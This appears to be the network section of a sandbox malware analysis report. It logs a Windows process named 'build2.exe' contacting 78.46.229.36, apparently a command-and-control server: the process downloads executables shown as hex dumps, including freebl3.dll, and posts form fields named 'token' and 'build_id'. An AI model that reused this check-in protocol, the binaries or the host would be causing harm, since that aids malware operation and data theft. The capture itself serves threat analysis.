                                                                                                                                                                                                                                      2024-03-28 16:51:47 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:47 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 2459136
                                                                                                                                                                                                                                      Last-Modified: Mon, 25 Mar 2024 09:53:07 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "66014983-258600"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      2024-03-28 16:51:47 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                      2024-03-28 16:51:47 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                      Data Ascii: X~e!*FW|>|L1146
                                                                                                                                                                                                                                      2024-03-28 16:51:47 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                                                                                                                                                                      Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                                                                                                                                                                      2024-03-28 16:51:47 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                                                                                                                                                                      Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                                                                                                                                                                      2024-03-28 16:51:47 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                                                                                                                                                                      Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                                                                                                                                                                      2024-03-28 16:51:47 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                      Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                      2024-03-28 16:51:48 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                      Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                      2024-03-28 16:51:48 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                                                                                                                                                                      Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                                                                                                                                                                      2024-03-28 16:51:48 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                                                                                                                                                                      Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                                                                                                                                                                      2024-03-28 16:51:48 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                                                                                                                                                                      Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      24192.168.2.64975978.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:52 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AAKKKEBFCGDBGDGCFHCB
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Content-Length: 829
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:51:52 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 33 63 30 32 34 38 63 31 64 31 33 31 36 36 34 36 64 66 66 61 30 61 37 61 62 35 61 30 39 37 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 33 39 65 66 32 62 62 63 64 33 39 66 63 64 35 39 63 35 37 34 36 62 66 65 34 32 33 38 63 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 4b 45 42 46 43 47 44 42 47 44 47 43 46 48 43 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="token"5d3c0248c1d1316646dffa0a7ab5a097------AAKKKEBFCGDBGDGCFHCBContent-Disposition: form-data; name="build_id"5739ef2bbcd39fcd59c5746bfe4238c5------AAKKKEBFCGDBGDGCFHCBCont
                                                                                                                                                                                                                                      2024-03-28 16:51:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:51:53 UTC18INData Raw: 38 0d 0a 59 6d 78 76 59 32 73 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8YmxvY2s=0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      25192.168.2.64976378.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:53 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHC
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Content-Length: 437
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:51:53 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 33 63 30 32 34 38 63 31 64 31 33 31 36 36 34 36 64 66 66 61 30 61 37 61 62 35 61 30 39 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 33 39 65 66 32 62 62 63 64 33 39 66 63 64 35 39 63 35 37 34 36 62 66 65 34 32 33 38 63 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="token"5d3c0248c1d1316646dffa0a7ab5a097------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="build_id"5739ef2bbcd39fcd59c5746bfe4238c5------AKEGDHJDHDAFHJJKJEHCCont
                                                                                                                                                                                                                                      2024-03-28 16:51:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:51:53 UTC18INData Raw: 38 0d 0a 59 6d 78 76 59 32 73 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8YmxvY2s=0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      26192.168.2.64976678.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:54 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHC
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Content-Length: 437
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:51:54 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 33 63 30 32 34 38 63 31 64 31 33 31 36 36 34 36 64 66 66 61 30 61 37 61 62 35 61 30 39 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 33 39 65 66 32 62 62 63 64 33 39 66 63 64 35 39 63 35 37 34 36 62 66 65 34 32 33 38 63 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------AEGHIJEHJDHIDHIDAEHCContent-Disposition: form-data; name="token"5d3c0248c1d1316646dffa0a7ab5a097------AEGHIJEHJDHIDHIDAEHCContent-Disposition: form-data; name="build_id"5739ef2bbcd39fcd59c5746bfe4238c5------AEGHIJEHJDHIDHIDAEHCCont
                                                                                                                                                                                                                                      2024-03-28 16:51:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:51:55 UTC18INData Raw: 38 0d 0a 59 6d 78 76 59 32 73 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8YmxvY2s=0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      27192.168.2.64976978.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:56 UTC205OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:51:56 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:56 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 685392
                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "6315a9f4-a7550"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      2024-03-28 16:51:56 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                                      2024-03-28 16:51:57 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                                                                                                                                                                                      Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                                                                                                                                                                                      2024-03-28 16:51:57 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                                                                                                                                                                                      Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
